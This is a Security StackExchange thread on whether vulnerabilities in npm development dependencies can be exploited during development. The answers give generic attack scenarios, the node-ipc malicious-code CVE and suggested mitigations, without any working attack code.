7

I am well aware that the best approach is to update any dependency, no matter whether it is a development dependency or a runtime/production dependency.

But from a research prospective, I want to know whether a vulnerability in development dependencies has the chance to be exploited.

Let's take JavaScript as an example which uses npm as the central package registry.

According to the definition, devDependencies (development dependencies) should contain packages which are used during development or which are used to build your bundle. For example, ESlint(linter), Mocha (test framework), and Webpack (module bundler).

Are the vulnerabilities in those development dependencies or other related development dependencies exploitable during the development phase? If yes, then are there any examples?

Note: The answers to other related questions mention supply chain attacks. However, from what I know, the key of supply chain attack is to inject malicious code into development dependencies, such as the well renown SolarWinds attack.

My question is different, since in this case I am asking whether the development dependency itself can have malicious code that could be injected by attackers, so that the development dependency would become malicious.

I would like to repeat myself:

What I am asking is whether attacker can exploit the vulnerability of "benigh" development dependency to harm the software I am developing in the developing phase.

Any real-world-examples would be great.

I would like to also know the possible mitigation options.

Sir Muffington
  • 1,447
  • 2
  • 9
  • 22
LGDGODV
  • 143
  • 5
  • You can literally just create this scenario out of thin air. Take any random old package, look at the exploits, and right there, it is exploitable. If you're using v1, you did not upgrade, but they fixed it in v2, that vulnerability is sitting in your old package. I have no idea why this needs to be asked. – Nelson Oct 19 '21 at 03:30
  • @Nelson, I am referring to "development dependency" here instead of runtime dependencies. Specifically, I want to know whether there are real-world exploits of such scenarios since many vulnerabilities are not exploitable or very hard to exploit. – LGDGODV Oct 19 '21 at 04:19
  • You're basically asking "is an unexploitable vulnerability exploitable?" which is an absurd question. You already claimed that these vulnerabilities are "not exploitable or very hard to exploit". The point is if you trust your other defenses enough, then you can do whatever you want. You didn't specify how you arrived at your initial premise. If you're asking a more general question, say "What are the attack vectors in a vulnerable development dependency?" then people can answer. – Nelson Oct 19 '21 at 04:25
  • @LGDGODV this appears like a question within my expertise, but could you please clarify what you ask? Your title appears to be a bit misleading as well. Are you talking about package vulns visible in this case when you run `npm audit`? – Sir Muffington Oct 19 '21 at 19:25
  • @SirMuffington thanks. Right, and I am thinking about the vulnerabilities reside in devdependencies. Are they exploitable when I am using those devdependencies to develop some software? If yes, are there any real-world exploits like this? For example, during my developing phase, is it possible for an attacker to exploit the vulnerability resides in the development dependency (such as "Eslint", "Webpack", "Codecov") to inject malicious code into the software I am developing? Real-world examples are better. Thanks. – LGDGODV Oct 20 '21 at 05:52
  • @LGDGODV I get the gist of it now, thanks. It's actually a brilliant question, let me summarize it all in an answer. – Sir Muffington Oct 20 '21 at 16:12
  • @LGDGODV let me know if you need more examples :-) I added the `event-stream` vulnerability, since it was the one that made headlines. – Sir Muffington Oct 20 '21 at 17:10

2 Answers2

6

It depends on the vulnerability, and on the threat environment (as is true for every component, not just development ones). Here are a few (generic) examples:

  1. A tool that fetches an external script from a specified location, and executes it. Vulnerability: The library fetches the script over HTTPS but does not validate the certificate. Exploitable: YES, a man-in-the-middle network attacker can replace the expected, trusted script with a malicious one to gain code execution on your machine.
  2. An application framework that, when launched for debugging, starts the application on one port and a debug service on another. The debug service can be used to control the program execution. Vulnerability: The debug service listens on all interfaces and is unauthenticated. Exploitable: YES, either a network attacker (if not blocked by a firewall) or a low-privilege user on the same host can connect to the debug server to gain control of the application, resulting in arbitrary code execution.
  3. Same as above, but the debug interface is instead a local (Unix) socket. Vulnerability: The socket is globally accessible. Exploitable: PROBABLY, in that any other user (or process running as another user) on your system can use the local socket to gain code execution as you. However, if the machine is single-user (no other users have code running) and the server doesn't have higher privileges than anything else (no opportunity for EoP), then it doesn't matter in that case.
  4. A tool that cryptographically signs publishable files. Vulnerability: The tool incorrectly truncates signatures longer than 4096 bits, resulting in less-secure and incorrect signatures. Exploitable: UNLIKELY, since RSA keys longer than 4096 bits are quite uncommon in practice, as 4096 bit RSA keys are already quite secure. Additionally, if you did use one, you'd hopefully notice that the signature doesn't validate... although if you didn't, that could cause problems for the consumer of your published files (which might be your own company) if they can't validate the files and/or if they use a validator which does validate the files (due to performing the same truncation) but the truncation makes it much easier to modify the files without invalidating the signature.
  5. A tool that generates files from templates. Vulnerability: The tool may incorrectly place the generated files relative to the system root rather than the current directory. Exploitable: UNLIKELY as the chances that the generated files accidentally overwriting anything are very low unless their directory structure resembles the system root are low, and the tool presumably does not run with elevated privileges and thus can't overwrite most files anyhow. A malicious dependency that appears benign could exploit this, causing the overwrite of e.g. your ~/.ssh/authorized_keys with a malicious value (if the vulnerable tool is used with it) without directly containing malicious code itself, but such an attack is very unlikely (and would technically be a supply-chain attack, just sneakily riding another tool's bugs).
  6. A tool that, among other things, can update Jira work items based on your commit messages. Vulnerability: The Jira integration first attempts HTTP for every request, only upgrading to HTTPS if redirected (as Jira normally does). Exploitable: DEPENDS on whether you use Jira or not. If you do, a network attacker can steal your Jira creds and make changes as you. If not, though, this vulnerability is irrelevant to your environment.
  7. A tool that uploads the results of a static analysis to a server over HTTPS. Vulnerability: The tool packages a version of OpenSSL that contains a denial-of-service vulnerability when used as a TLS server. Exploitable: NO, the tool does not act as a TLS server, only as a TLS client, so the vulnerability is irrelevant to its use case.
CBHacking
  • 40,303
  • 3
  • 74
  • 98
  • This answer misses a lot of the main question points apparently and only lists examples without providing any real-world examples so imo it's only a partial answer – Munchkin Oct 26 '21 at 10:59
4

While running the npm start command and the dev env set to development or running a special command (like npm run dev, where dev is a special script which starts up a local development environment as specified in package.json), which executes the devDependencies specified in the package.json. Of course it's up to the user in some cases to first include the required files, but there are exceptions like fake (simulated) APIs, localhost servers like used in Angular (you run it with ng serve, which actually by default does not contain even self-signed SSL certificates) and etc. Now the real danger is that Bash/PowerShell/Batch files and Binaries could also be executed this way, which is a big yikes!

Now to the main part of the question - what possible harm could it do? Since it executes any arbitrary code ignoring the fact that the V8 (still in 2021 it's considered the most secure JavaScript engine) includes a great Sandbox for which Google put a lot of work to get secure and going in blind without any code review it could mean one of the following:

  • Upload and leak your whole source code
  • Destroy your source code
  • Since it has filesystem access it could mess with your filesystem and possibly in theory in extension for example install rootkits
  • It could sniff your local network traffic, which is usually nowadays encrypted
  • It could host an Evil AP Twin
  • Trojans, worms, cryptominers etc
  • It could read your network activity
  • It could mess with your packets, send out packets you don't want
  • Mess with your certificates, forge them etc
  • A malicious linter could you do the opposite of snyk.io - insert/suggest building vulnerabilities into your app and so in production making a vulnerable app/API
  • In theory even damage your hardware
  • Obfuscate itself to hide malicious code
  • Combinations of these and more...

...and other possibilities that generally malware has... Security StackExchange is full of other suggestions how it might get abused.

There's no built-in permissions system or anything like that so the possibilities are pretty much endless apparently...

More realistic examples include: vulnerable parsers, which could read to RCEs etc, bad crypto, which can easily be "hacked" (this was present in the native library crypto and if I'm right still in crypto and there used to be warnings in the documentation to not use some of the methods), see history of vulnerabilities below.

Now, what about local development servers? Can't they be crawled by bots from the outside a.k.a. World Wide Web? Well it depends on your firewall, router and your local server implementation. Usually local dev servers use a localhost interface (as done in Windows) or a 127.0.0.1 local IP, which is accessible only inside the LAN. I have seen some amateur made local dev servers using 0.0.0.0 interface on Unix, which is a big yikes if you're open to the World Wild Web, meaning your APIs can get bruteforced and as all complex APIs (again it depends on your API) open up a door for malware to your machine (I am of course implying that the API gets discovered and it has write and execution (usually via vulnerabilities like LFI etc) possibilities).

How hard is it to review JavaScript in modules? Well, nowadays the obfuscation and minimization tools are quite advanced and there are companies specialized in this field and they supposedly promise that your JavaScript will not be reverse-engineered with medium effort. If you want a good example I always point to a popular xkcd comic, which contains obfuscated JavaScript for a right-click menu https://xkcd.com/1975/

Also, there's a danger of spawning of malicious service workers and other shenanigans.

If you want maximum security in development and production and want to use JavaScript I would recommend looking into Deno, which is actually developed including the same Ryan Dahl who initially developed Node.js and thought to himself "hey, I would do better". He made a video called "10 things I regret about Node.js". The link for the video is here: https://www.youtube.com/watch?v=M3BM9TB-8yA As from approx. 6:13 in the video the developer admits that the Node.js main event loop has access to all sorts of system calls. Since Node.js is usually run as admin/root this could lead to all the possibilities mentioned above.

If you want to see a more secure infrastructure please look in the video at the timestamp 18:59.

Apparently npm audit does no actual code analysis and only shows reported vulnerabilities, but that doesn't solve any of the problems. GitHub security bots and Snyk.io bots on the other hand do have the possibility of detecting such vulnerabilities as long as the modules are not obfuscated.

What I find extremely likely to happen is that there are certainly no limits set on the following actions:

  • Hijacking require() calls, like it's done by well meant software like babel, TypeScript components etc
  • Surprisingly, it can override core modules, literally.

I'm a hardcore coder, what can I do?

I'm glad you asked. Node.js API (or core modules, whatever you wanna call it) contains a VM API. For more information look into this documentation link . You could so get the features of V8 Sandbox for your code, but as in the link it's stated the maintainers of Node.js recommend AGAINST running untrusted code inside of it.

History of vulnerabilities in dev packages

ID: CVE-2022-23812
Title: Arbitrary file overwrite vulnerability in the Node-IPC NPM package

Description: T The package node-ipc versions 10.1.1 and 10.1.2 are vulnerable to embedded malicious code that was introduced by the maintainer. The malicious code was intended to overwrite arbitrary files depending on the geolocation of the user's IP address. The maintainer removed the malicious code in version 10.1.3. CVSS v3.1 Base Score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

general hkcert advice about third party dependencies

not to mention the usual typosquatting

Sir Muffington
  • 1,447
  • 2
  • 9
  • 22